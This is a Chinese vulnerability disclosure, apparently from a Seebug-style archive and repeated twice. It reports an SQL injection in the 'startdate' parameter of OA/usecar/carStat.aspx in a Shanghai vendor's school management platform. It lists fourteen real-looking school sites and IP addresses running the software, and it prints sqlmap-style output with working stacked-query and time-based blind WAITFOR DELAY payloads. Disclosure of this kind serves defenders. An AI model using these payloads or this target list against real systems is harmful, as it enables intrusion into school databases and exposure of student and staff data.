VULHUB ™

### 简要描述： 某学校综合管理系统通用SQL注入漏洞 ### 详细说明： 系统名称：学校综合管理平台 厂商：上海安脉计算机科技有限公司 关键字：版权所有：上海安脉计算机科技有限公司 系统架构：ASPX+MSSQL 漏洞文件：OA/usecar/carStat.aspx 注入参数：startdate 枚举部分案例： http://anmai.net:81/OA/usecar/carStat.aspx http://jwxx.am.jsedu.sh.cn/ANMAI/OA/usecar/carStat.aspx http://bssyxxgl.eicbs.com/OA/usecar/carStat.aspx http://cjzx.am.jsedu.sh.cn/OA/usecar/carStat.aspx http://glpt.nhshs.edu.sh.cn/OA/usecar/carStat.aspx http://218.78.241.80/anmai/OA/usecar/carStat.aspx http://www.aqyz.net/anmai/OA/usecar/carStat.aspx http://218.22.96.74:8899/anmai/OA/usecar/carStat.aspx http://120.69.153.68:8002/anmai654202_458357247/OA/usecar/carStat.aspx http://222.82.229.202:2010/anmai/OA/usecar/carStat.aspx http://58.118.20.5/anmai/OA/usecar/carStat.aspx http://124.228.32.115:81/OA/usecar/carStat.aspx http://luoxzx.am.jsedu.sh.cn/OA/usecar/carStat.aspx http://www.syzxyz.com:8008/OA/usecar/carStat.aspx 漏洞验证： 这里以http://anmai.net:81/OA/usecar/carStat.aspx为例： [<img...

### 简要描述： 某学校综合管理系统通用SQL注入漏洞 ### 详细说明： 系统名称：学校综合管理平台 厂商：上海安脉计算机科技有限公司 关键字：版权所有：上海安脉计算机科技有限公司 系统架构：ASPX+MSSQL 漏洞文件：OA/usecar/carStat.aspx 注入参数：startdate 枚举部分案例： http://anmai.net:81/OA/usecar/carStat.aspx http://jwxx.am.jsedu.sh.cn/ANMAI/OA/usecar/carStat.aspx http://bssyxxgl.eicbs.com/OA/usecar/carStat.aspx http://cjzx.am.jsedu.sh.cn/OA/usecar/carStat.aspx http://glpt.nhshs.edu.sh.cn/OA/usecar/carStat.aspx http://218.78.241.80/anmai/OA/usecar/carStat.aspx http://www.aqyz.net/anmai/OA/usecar/carStat.aspx http://218.22.96.74:8899/anmai/OA/usecar/carStat.aspx http://120.69.153.68:8002/anmai654202_458357247/OA/usecar/carStat.aspx http://222.82.229.202:2010/anmai/OA/usecar/carStat.aspx http://58.118.20.5/anmai/OA/usecar/carStat.aspx http://124.228.32.115:81/OA/usecar/carStat.aspx http://luoxzx.am.jsedu.sh.cn/OA/usecar/carStat.aspx http://www.syzxyz.com:8008/OA/usecar/carStat.aspx 漏洞验证： 这里以http://anmai.net:81/OA/usecar/carStat.aspx为例： [<img src="https://images.seebug.org/upload/201503/19194413f8d66a26f8e6120c590473bd8b20eb32.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/19194413f8d66a26f8e6120c590473bd8b20eb32.png) ``` Place: POST Parameter: startdate Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: __VIEWSTATE=dDwtNTg3NzY1MDczO3Q8O2w8aTwxPjs O2w8dDw7bDxpPDExPjs O2w 8dDxwPGw8c3R5bGU7PjtsPFdJRFRIOiAyMDBweFw7Qk9SREVSLUNPTExBUFNFOiBjb2xsYXBzZTs Pjs 7Pjs Pjs PjtsPHJhZGlvMTtyYWRpbzI7cmFkaW8zOz4 eOIu6P466wBbRJJMGVTZGsfcbs4=&isOK=& aa=3&startdate=2015-03-02'; WAITFOR DELAY '0:0:5'--&enddate=2015-03-18 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: __VIEWSTATE=dDwtNTg3NzY1MDczO3Q8O2w8aTwxPjs O2w8dDw7bDxpPDExPjs O2w 8dDxwPGw8c3R5bGU7PjtsPFdJRFRIOiAyMDBweFw7Qk9SREVSLUNPTExBUFNFOiBjb2xsYXBzZTs Pjs 7Pjs Pjs PjtsPHJhZGlvMTtyYWRpbzI7cmFkaW8zOz4 eOIu6P466wBbRJJMGVTZGsfcbs4=&isOK=& aa=3&startdate=2015-03-02' WAITFOR DELAY '0:0:5'--&enddate=2015-03-18 ``` [<img src="https://images.seebug.org/upload/201503/1919464678baac8dd8d9ff4db16897ccccf7a36b.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/1919464678baac8dd8d9ff4db16897ccccf7a36b.png) 数据库： [<img src="https://images.seebug.org/upload/201503/19194517fc93bef952bcceb58ef6b6112e2a4206.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/19194517fc93bef952bcceb58ef6b6112e2a4206.png) ### 漏洞证明： 系统名称：学校综合管理平台 厂商：上海安脉计算机科技有限公司 关键字：版权所有：上海安脉计算机科技有限公司 系统架构：ASPX+MSSQL 漏洞文件：OA/usecar/carStat.aspx 注入参数：startdate 枚举部分案例： http://anmai.net:81/OA/usecar/carStat.aspx http://jwxx.am.jsedu.sh.cn/ANMAI/OA/usecar/carStat.aspx http://bssyxxgl.eicbs.com/OA/usecar/carStat.aspx http://cjzx.am.jsedu.sh.cn/OA/usecar/carStat.aspx http://glpt.nhshs.edu.sh.cn/OA/usecar/carStat.aspx http://218.78.241.80/anmai/OA/usecar/carStat.aspx http://www.aqyz.net/anmai/OA/usecar/carStat.aspx http://218.22.96.74:8899/anmai/OA/usecar/carStat.aspx http://120.69.153.68:8002/anmai654202_458357247/OA/usecar/carStat.aspx http://222.82.229.202:2010/anmai/OA/usecar/carStat.aspx http://58.118.20.5/anmai/OA/usecar/carStat.aspx http://124.228.32.115:81/OA/usecar/carStat.aspx http://luoxzx.am.jsedu.sh.cn/OA/usecar/carStat.aspx http://www.syzxyz.com:8008/OA/usecar/carStat.aspx 漏洞验证： 这里以http://anmai.net:81/OA/usecar/carStat.aspx为例： [<img src="https://images.seebug.org/upload/201503/19194413f8d66a26f8e6120c590473bd8b20eb32.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/19194413f8d66a26f8e6120c590473bd8b20eb32.png) ``` Place: POST Parameter: startdate Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: __VIEWSTATE=dDwtNTg3NzY1MDczO3Q8O2w8aTwxPjs O2w8dDw7bDxpPDExPjs O2w 8dDxwPGw8c3R5bGU7PjtsPFdJRFRIOiAyMDBweFw7Qk9SREVSLUNPTExBUFNFOiBjb2xsYXBzZTs Pjs 7Pjs Pjs PjtsPHJhZGlvMTtyYWRpbzI7cmFkaW8zOz4 eOIu6P466wBbRJJMGVTZGsfcbs4=&isOK=& aa=3&startdate=2015-03-02'; WAITFOR DELAY '0:0:5'--&enddate=2015-03-18 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: __VIEWSTATE=dDwtNTg3NzY1MDczO3Q8O2w8aTwxPjs O2w8dDw7bDxpPDExPjs O2w 8dDxwPGw8c3R5bGU7PjtsPFdJRFRIOiAyMDBweFw7Qk9SREVSLUNPTExBUFNFOiBjb2xsYXBzZTs Pjs 7Pjs Pjs PjtsPHJhZGlvMTtyYWRpbzI7cmFkaW8zOz4 eOIu6P466wBbRJJMGVTZGsfcbs4=&isOK=& aa=3&startdate=2015-03-02' WAITFOR DELAY '0:0:5'--&enddate=2015-03-18 ``` [<img src="https://images.seebug.org/upload/201503/191946337d01976524a70082172286e73e70e022.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/191946337d01976524a70082172286e73e70e022.png) 数据库： [<img src="https://images.seebug.org/upload/201503/19194517fc93bef952bcceb58ef6b6112e2a4206.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/19194517fc93bef952bcceb58ef6b6112e2a4206.png)